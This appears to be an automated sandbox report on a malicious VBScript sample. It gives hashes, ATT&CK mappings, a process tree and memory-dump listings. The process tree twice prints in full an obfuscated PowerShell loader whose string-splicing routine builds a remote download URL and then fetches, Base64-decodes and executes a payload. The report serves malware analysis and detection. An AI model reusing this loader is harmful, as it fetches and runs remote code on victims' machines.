d1111adda003cfe11639253cac71d80563e971e5b922b146cb8065f958e5ba39

General

Target

cee53b67fc3a98f333647160479fc84b43cf2fe81d7823e827be71575e408841.vbs
Size

89KB
MD5

579b40b4b7a10634484506fa4b2d10e3
SHA1

c7d86c7d1eb31e68dab4339338dce8df8595882b
SHA256

cee53b67fc3a98f333647160479fc84b43cf2fe81d7823e827be71575e408841
SHA512

c982bdc2d50b35cd901c6d373c42298d937f38fe95544e5102d15a050b1effd46dd69ba5811dd5b590514be19dba0282543c5c2c0a8e79604f505f3b1b5b0878
SSDEEP

1536:z8Q6nLzHlMBFXdzvnB1iG58Q7EnMdFaKEv3h64LAOfnCyLb5Eo:YQMLTKHXdz/7p5z7OKFaKEv3h64LAO/r

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4952	4184	WerFault.exe	37

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\Dagtyve1:\Dagtyve2	WScript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5068	powershell.exe
5068	powershell.exe
4184	powershell.exe
4184	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4732 wrote to memory of 5068	4732	WScript.exe	19
PID 4732 wrote to memory of 5068	4732	WScript.exe	19
PID 5068 wrote to memory of 4288	5068	powershell.exe	32
PID 5068 wrote to memory of 4288	5068	powershell.exe	32
PID 5068 wrote to memory of 4184	5068	powershell.exe	37
PID 5068 wrote to memory of 4184	5068	powershell.exe	37
PID 5068 wrote to memory of 4184	5068	powershell.exe	37
PID 4184 wrote to memory of 4196	4184	powershell.exe	88
PID 4184 wrote to memory of 4196	4184	powershell.exe	88
PID 4184 wrote to memory of 4196	4184	powershell.exe	88

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cee53b67fc3a98f333647160479fc84b43cf2fe81d7823e827be71575e408841.vbs"
1⤵
- Checks computer location settings
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Wussmo100;Function Stakaanded9 ([String]$Skil){For($Stilfor=5; $Stilfor -lt $Skil.Length-$Vanligkau; $Stilfor+=6){$Grews=$Skil.'Substring'($Stilfor, $Vanligkau);$peripro=$peripro+$Grews}$peripro;}$Fabriksin = 'echo 1 && exit';$Vanligkau = (cmd /c $Fabriksin);$overi=Stakaanded9 'GdsknhHjemstbreddtKonvepUdvikspreco:Vidun/Viveb/HegnsdTheocr MoheiDisbov penteBetyd.VarefgtunicoMonstoGivnegThrallLadeteLaugh.Outkecskemao CoccmArgas/ Skruu PleacPreag?CaveaeTagryxAnomapcurvioBeretrRagabtCrout=LancedDarumoAlchewPrisnn fordlUnbeao Rtoraforldd Devi&KeratiiskredVerde= Valg1AlifovTaxodDMinds8ProgyOGldelUUnbilZ RecoQSanseJUnfuraBenne1euryazPjaskS FusiyudbredBurglZVbnerZ LamahBrndejAlabae Wate7EineoOTurfexUnacqFStrmpTFrolizStvenVribniwClyveNEnkemg plotQ DichE Pgntk Band ';$peripro01=Stakaanded9 'NapoliStoryeFlatcxTopgr ';$Linjemelle = Stakaanded9 'Crino\ RaavsAfteryFenzes LabowSvedeoStathwSculp6Genev4Konom\oreamWOversi EnfonTrnerdGerekoSdeliwHaynesrandbPBestyoTenniwGenneeRumorrDiagoSPeerahEscoleLbelslBelyslStorm\ knicvForst1Prelo.Mozin0Organ\ preppEupoloRaysfw Score PararSoothsForsrhmangoeYaupolBabyslsenil.RetraeHillsxBlikdeForud ';&($peripro01) (Stakaanded9 'Sider$ BertMHampeiGurtssSkuffewapperSandse Sort2Tusca= Inds$Slicee Nothn SukkvChrom: DharwjerkeiIndusn IngedCarroi Leptr Morb ') ;&($peripro01) (Stakaanded9 ' Heme$TvangLFiskeiAccusn HastjToggleBrugemHypereyurtsl StralSelvaeKiven=Poder$konsuMKvivaistands OplaeBalanr EliseRunho2Tersu+Dagsr$BastaLDanneiAmortnBawdrjUdmaneCrakemLandseTaliolEmbowlSlyngeBundt ') ;&($peripro01) (Stakaanded9 'Evalu$ BrdfRrespre BallaParentHibertFrankrMarekiNskedbKipsluUnembtUncre Diskb=Enlig Hjemm( Dist(RadiogSpirewBabelmTekstiHypok Dvelw Orbii Skivn Typo3Overv2 Akko_ SammpOveror CalloHeadscEndiaeSubjes middsCanyb Smil-GalanFTolva BeatiPFrostrDisenoIsovacukvineSformsRundesMaaneISneapd Sulf=Steml$Under{FllesP DeniI GravDArgyr}Ubesi)Produ.EtnisCVgteroDiktamIrishmExtraaOverrnForesdAtlatLIneffisheepn flueeSamse)Conso morge-UndersNutripDoperlSpecii backtForet yngli[SupercJoslphKlariaUdkryr Cogo]Halfe3Subhe4 Phal ');&($peripro01) (Stakaanded9 'Sjlek$HandeR BenzeLangttFritusAggraivejdin Kimbsfusob2Unral1udski7Fartm Lftes=squin Smede$dokumR Hodmeforspa OyestTsedetKoranr InraiGemenbTheriuForhat ligh[Capac$NonacRBrikeeRotataPrenutunmantperivrPsylliDrhambSlagvu TagstFistu.Stromc situoKonceu leecnLselitZerot-Posse2Trapp]Forso ');&($peripro01) (Stakaanded9 'Cresc$CentrG Terpa LetmdTapesemonorsinterlpalesgChiefeSamli=Bland(KardiT cubie ForssCirkatKonku-SubdiP Solea EbontfibrehBoble Bokar$electLKwmikistemnnAlmenjBaskeeHuskem MisbesesamlLivsklAlumievarme) none Livst-BrugsABarcanEnheddNonde Komfo(Confl[IndgrIUndernHidebtPilulP MachtFortor Fila]Bedla: Unre:Pannes ChapiSjlegzManageErhve Gree-Mesose UndeqDobbe Klare8Paapa)Aarsa ') ;if ($Gadeslge) {.$Linjemelle $Retsins217;} else {;$peripro00=Stakaanded9 ' IndgS AlfrtReferaMusefrTolvttThion-cobblB RadaiGidspt Palis ToneTEnersrThrukaDorotnOveres SphefRambeeColicrEpiga Hydro-WinceSHoldao SchouThronrGkantcAffoleNonre Kalk$DenatoAandevEpisceAutoprBeholiHuppo Hexis-DisboDKonnoeUgerasJordetFetloiGjaldnHeteraBirketPsychiComploMyelonStabl Buoy$HyperMEkstriAmarys ForseHajilrNucleeMottr2Oreod ';&($peripro01) (Stakaanded9 'Ambro$HistrMTrngsiSkrivsSpeckeTonefrTawedeParon2Munke=Nanno$AktieeLashlnPralevLderr:SheevaSedilpSelflp bribdPapega SanitSkaala Silv ') ;&($peripro01) (Stakaanded9 ' stikIPossem ResopFryseotransrTornlt Stje-IndexM RkenoPatindCracku TalelWarmeeSuppl GenfoBSyndei MesotKbsvasKonveT FacerUntera ImponPolynsTilkefAfstteTransrlredr ') ;$Misere2=$Misere2+'\Pigmen.Sam';while (-not $Eudal) {&($peripro01) (Stakaanded9 ' Camb$AstroEBravuuPlatidVialmaraspblSnebo=Reele(BlowjT PerieFedthsForest Phar-ChancPUddanaBroddtMaurihPudde Beskf$UnderM Eftei Metas YdereProdurTeksteEposf2Tafte)Prakk ') ;&($peripro01) $peripro00;&($peripro01) (Stakaanded9 'SlagvSSnurptAnnisaMedicrCentutFacil-ZygotS Quaklleukee ColdeOverhpVerse Phoce5 Mono ');}&($peripro01) (Stakaanded9 'Indiv$ GetsSAngiotPeaceaStaphk RetuaHaandaCoxennTrefad UndeeHydrodPapal Belyv=Consu NringGUndereEjefatGymna-UnsalCAllanoPlissnUncont Shike VedenIsmaitSutte Nonil$PopovM deliiSennesRekure ForsrOutpue Aeti2Rodet ');&($peripro01) (Stakaanded9 'Basta$autooS BeskkShipsyWareht EloitSwinge UnilfBungliSingesMesme Coali=Bobin Defe[ WorkSOpnory GamasTrapit AndreKrlhamPensi. BarnC Syndo Monon Tequv BondeVoldtrudpolt Saur] Zann:Opkom:airtsFPenmarBootloAngiomproduBSentiaMndensHooyeeProdu6Dombg4BegynSKvldetChempr KaffiFlattnUnweagAutho( Udsy$EnergSGynostIldpraKortfkProvea IschaMedianStrobdHelioeTilsndInter)Armen ');&($peripro01) (Stakaanded9 ' Prse$ packpGrozeeUnsinr Pseui EdwapDanmar UndioForev2 Dore Ledni=Liber Arbor[UsneaSBildry Proxs Polyt FlaceBoligmProvi.InkasTRekapeFortrxOzonotAllas.CoverE SojanColopcBespeoRelisd LegeiLombanErgotgBudce] Bolt:Planf:surreASlighS FlanCTetraIEsplaIFrems.UnderG Uduee BisctTilpaSOraketPaastrCibboiRepubnUsufrgGydts(Radio$WantfSAndrokEnetayHitactNonopt CirceFrimrfThymii Uvrds Alme)septi ');&($peripro01) (Stakaanded9 'Mercu$KlostUMinisnIdiocsHalvapAandsaSupernStrae=Udvik$ Smmep ClibeFlaunr OmkriLambcpChamerEpenco Suba2Homof.FeriesHeteruUpdivb TuttsGyrattDesporMediei ServnKriseg rest(Flyse2 Skra7 Zoom1 Natr8 Myel4Skree4Micro,Afmat1 Fruc9Rette7Forpa8Coqui8Joeys)Finds ');&($peripro01) $Unspan;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5068
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
    3⤵
    PID:4288
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Wussmo100;Function Stakaanded9 ([String]$Skil){For($Stilfor=5; $Stilfor -lt $Skil.Length-$Vanligkau; $Stilfor+=6){$Grews=$Skil.'Substring'($Stilfor, $Vanligkau);$peripro=$peripro+$Grews}$peripro;}$Fabriksin = 'echo 1 && exit';$Vanligkau = (cmd /c $Fabriksin);$overi=Stakaanded9 'GdsknhHjemstbreddtKonvepUdvikspreco:Vidun/Viveb/HegnsdTheocr MoheiDisbov penteBetyd.VarefgtunicoMonstoGivnegThrallLadeteLaugh.Outkecskemao CoccmArgas/ Skruu PleacPreag?CaveaeTagryxAnomapcurvioBeretrRagabtCrout=LancedDarumoAlchewPrisnn fordlUnbeao Rtoraforldd Devi&KeratiiskredVerde= Valg1AlifovTaxodDMinds8ProgyOGldelUUnbilZ RecoQSanseJUnfuraBenne1euryazPjaskS FusiyudbredBurglZVbnerZ LamahBrndejAlabae Wate7EineoOTurfexUnacqFStrmpTFrolizStvenVribniwClyveNEnkemg plotQ DichE Pgntk Band ';$peripro01=Stakaanded9 'NapoliStoryeFlatcxTopgr ';$Linjemelle = Stakaanded9 'Crino\ RaavsAfteryFenzes LabowSvedeoStathwSculp6Genev4Konom\oreamWOversi EnfonTrnerdGerekoSdeliwHaynesrandbPBestyoTenniwGenneeRumorrDiagoSPeerahEscoleLbelslBelyslStorm\ knicvForst1Prelo.Mozin0Organ\ preppEupoloRaysfw Score PararSoothsForsrhmangoeYaupolBabyslsenil.RetraeHillsxBlikdeForud ';&($peripro01) (Stakaanded9 'Sider$ BertMHampeiGurtssSkuffewapperSandse Sort2Tusca= Inds$Slicee Nothn SukkvChrom: DharwjerkeiIndusn IngedCarroi Leptr Morb ') ;&($peripro01) (Stakaanded9 ' Heme$TvangLFiskeiAccusn HastjToggleBrugemHypereyurtsl StralSelvaeKiven=Poder$konsuMKvivaistands OplaeBalanr EliseRunho2Tersu+Dagsr$BastaLDanneiAmortnBawdrjUdmaneCrakemLandseTaliolEmbowlSlyngeBundt ') ;&($peripro01) (Stakaanded9 'Evalu$ BrdfRrespre BallaParentHibertFrankrMarekiNskedbKipsluUnembtUncre Diskb=Enlig Hjemm( Dist(RadiogSpirewBabelmTekstiHypok Dvelw Orbii Skivn Typo3Overv2 Akko_ SammpOveror CalloHeadscEndiaeSubjes middsCanyb Smil-GalanFTolva BeatiPFrostrDisenoIsovacukvineSformsRundesMaaneISneapd Sulf=Steml$Under{FllesP DeniI GravDArgyr}Ubesi)Produ.EtnisCVgteroDiktamIrishmExtraaOverrnForesdAtlatLIneffisheepn flueeSamse)Conso morge-UndersNutripDoperlSpecii backtForet yngli[SupercJoslphKlariaUdkryr Cogo]Halfe3Subhe4 Phal ');&($peripro01) (Stakaanded9 'Sjlek$HandeR BenzeLangttFritusAggraivejdin Kimbsfusob2Unral1udski7Fartm Lftes=squin Smede$dokumR Hodmeforspa OyestTsedetKoranr InraiGemenbTheriuForhat ligh[Capac$NonacRBrikeeRotataPrenutunmantperivrPsylliDrhambSlagvu TagstFistu.Stromc situoKonceu leecnLselitZerot-Posse2Trapp]Forso ');&($peripro01) (Stakaanded9 'Cresc$CentrG Terpa LetmdTapesemonorsinterlpalesgChiefeSamli=Bland(KardiT cubie ForssCirkatKonku-SubdiP Solea EbontfibrehBoble Bokar$electLKwmikistemnnAlmenjBaskeeHuskem MisbesesamlLivsklAlumievarme) none Livst-BrugsABarcanEnheddNonde Komfo(Confl[IndgrIUndernHidebtPilulP MachtFortor Fila]Bedla: Unre:Pannes ChapiSjlegzManageErhve Gree-Mesose UndeqDobbe Klare8Paapa)Aarsa ') ;if ($Gadeslge) {.$Linjemelle $Retsins217;} else {;$peripro00=Stakaanded9 ' IndgS AlfrtReferaMusefrTolvttThion-cobblB RadaiGidspt Palis ToneTEnersrThrukaDorotnOveres SphefRambeeColicrEpiga Hydro-WinceSHoldao SchouThronrGkantcAffoleNonre Kalk$DenatoAandevEpisceAutoprBeholiHuppo Hexis-DisboDKonnoeUgerasJordetFetloiGjaldnHeteraBirketPsychiComploMyelonStabl Buoy$HyperMEkstriAmarys ForseHajilrNucleeMottr2Oreod ';&($peripro01) (Stakaanded9 'Ambro$HistrMTrngsiSkrivsSpeckeTonefrTawedeParon2Munke=Nanno$AktieeLashlnPralevLderr:SheevaSedilpSelflp bribdPapega SanitSkaala Silv ') ;&($peripro01) (Stakaanded9 ' stikIPossem ResopFryseotransrTornlt Stje-IndexM RkenoPatindCracku TalelWarmeeSuppl GenfoBSyndei MesotKbsvasKonveT FacerUntera ImponPolynsTilkefAfstteTransrlredr ') ;$Misere2=$Misere2+'\Pigmen.Sam';while (-not $Eudal) {&($peripro01) (Stakaanded9 ' Camb$AstroEBravuuPlatidVialmaraspblSnebo=Reele(BlowjT PerieFedthsForest Phar-ChancPUddanaBroddtMaurihPudde Beskf$UnderM Eftei Metas YdereProdurTeksteEposf2Tafte)Prakk ') ;&($peripro01) $peripro00;&($peripro01) (Stakaanded9 'SlagvSSnurptAnnisaMedicrCentutFacil-ZygotS Quaklleukee ColdeOverhpVerse Phoce5 Mono ');}&($peripro01) (Stakaanded9 'Indiv$ GetsSAngiotPeaceaStaphk RetuaHaandaCoxennTrefad UndeeHydrodPapal Belyv=Consu NringGUndereEjefatGymna-UnsalCAllanoPlissnUncont Shike VedenIsmaitSutte Nonil$PopovM deliiSennesRekure ForsrOutpue Aeti2Rodet ');&($peripro01) (Stakaanded9 'Basta$autooS BeskkShipsyWareht EloitSwinge UnilfBungliSingesMesme Coali=Bobin Defe[ WorkSOpnory GamasTrapit AndreKrlhamPensi. BarnC Syndo Monon Tequv BondeVoldtrudpolt Saur] Zann:Opkom:airtsFPenmarBootloAngiomproduBSentiaMndensHooyeeProdu6Dombg4BegynSKvldetChempr KaffiFlattnUnweagAutho( Udsy$EnergSGynostIldpraKortfkProvea IschaMedianStrobdHelioeTilsndInter)Armen ');&($peripro01) (Stakaanded9 ' Prse$ packpGrozeeUnsinr Pseui EdwapDanmar UndioForev2 Dore Ledni=Liber Arbor[UsneaSBildry Proxs Polyt FlaceBoligmProvi.InkasTRekapeFortrxOzonotAllas.CoverE SojanColopcBespeoRelisd LegeiLombanErgotgBudce] Bolt:Planf:surreASlighS FlanCTetraIEsplaIFrems.UnderG Uduee BisctTilpaSOraketPaastrCibboiRepubnUsufrgGydts(Radio$WantfSAndrokEnetayHitactNonopt CirceFrimrfThymii Uvrds Alme)septi ');&($peripro01) (Stakaanded9 'Mercu$KlostUMinisnIdiocsHalvapAandsaSupernStrae=Udvik$ Smmep ClibeFlaunr OmkriLambcpChamerEpenco Suba2Homof.FeriesHeteruUpdivb TuttsGyrattDesporMediei ServnKriseg rest(Flyse2 Skra7 Zoom1 Natr8 Myel4Skree4Micro,Afmat1 Fruc9Rette7Forpa8Coqui8Joeys)Finds ');&($peripro01) $Unspan;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 2372
      4⤵
      Program crash
      PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4184 -ip 4184
1⤵
PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdtwxebs.t0c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4184-20-0x0000000006200000-0x0000000006266000-memory.dmp

Filesize
408KB

Download
memory/4184-30-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/4184-40-0x0000000075390000-0x0000000075B40000-memory.dmp

Filesize
7.7MB

Download
memory/4184-39-0x0000000007F40000-0x0000000007F54000-memory.dmp

Filesize
80KB

Download
memory/4184-13-0x0000000002FD0000-0x0000000003006000-memory.dmp

Filesize
216KB

Download
memory/4184-15-0x0000000002FB0000-0x0000000002FC0000-memory.dmp

Filesize
64KB

Download
memory/4184-38-0x0000000007EA0000-0x0000000007EC2000-memory.dmp

Filesize
136KB

Download
memory/4184-14-0x0000000075390000-0x0000000075B40000-memory.dmp

Filesize
7.7MB

Download
memory/4184-17-0x0000000005A80000-0x00000000060A8000-memory.dmp

Filesize
6.2MB

Download
memory/4184-18-0x00000000059F0000-0x0000000005A12000-memory.dmp

Filesize
136KB

Download
memory/4184-37-0x0000000008900000-0x0000000008EA4000-memory.dmp

Filesize
5.6MB

Download
memory/4184-16-0x0000000002FB0000-0x0000000002FC0000-memory.dmp

Filesize
64KB

Download
memory/4184-33-0x0000000008280000-0x00000000088FA000-memory.dmp

Filesize
6.5MB

Download
memory/4184-32-0x00000000068F0000-0x000000000693C000-memory.dmp

Filesize
304KB

Download
memory/4184-31-0x00000000068B0000-0x00000000068CE000-memory.dmp

Filesize
120KB

Download
memory/4184-34-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/4184-19-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/4184-36-0x0000000007AC0000-0x0000000007AE2000-memory.dmp

Filesize
136KB

Download
memory/4184-35-0x0000000007B20000-0x0000000007BB6000-memory.dmp

Filesize
600KB

Download
memory/5068-12-0x0000027007450000-0x0000027007460000-memory.dmp

Filesize
64KB

Download
memory/5068-5-0x000002701FA10000-0x000002701FA32000-memory.dmp

Filesize
136KB

Download
memory/5068-10-0x00007FFDCF340000-0x00007FFDCFE01000-memory.dmp

Filesize
10.8MB

Download
memory/5068-11-0x0000027007450000-0x0000027007460000-memory.dmp

Filesize
64KB

Download
memory/5068-43-0x00007FFDCF340000-0x00007FFDCFE01000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing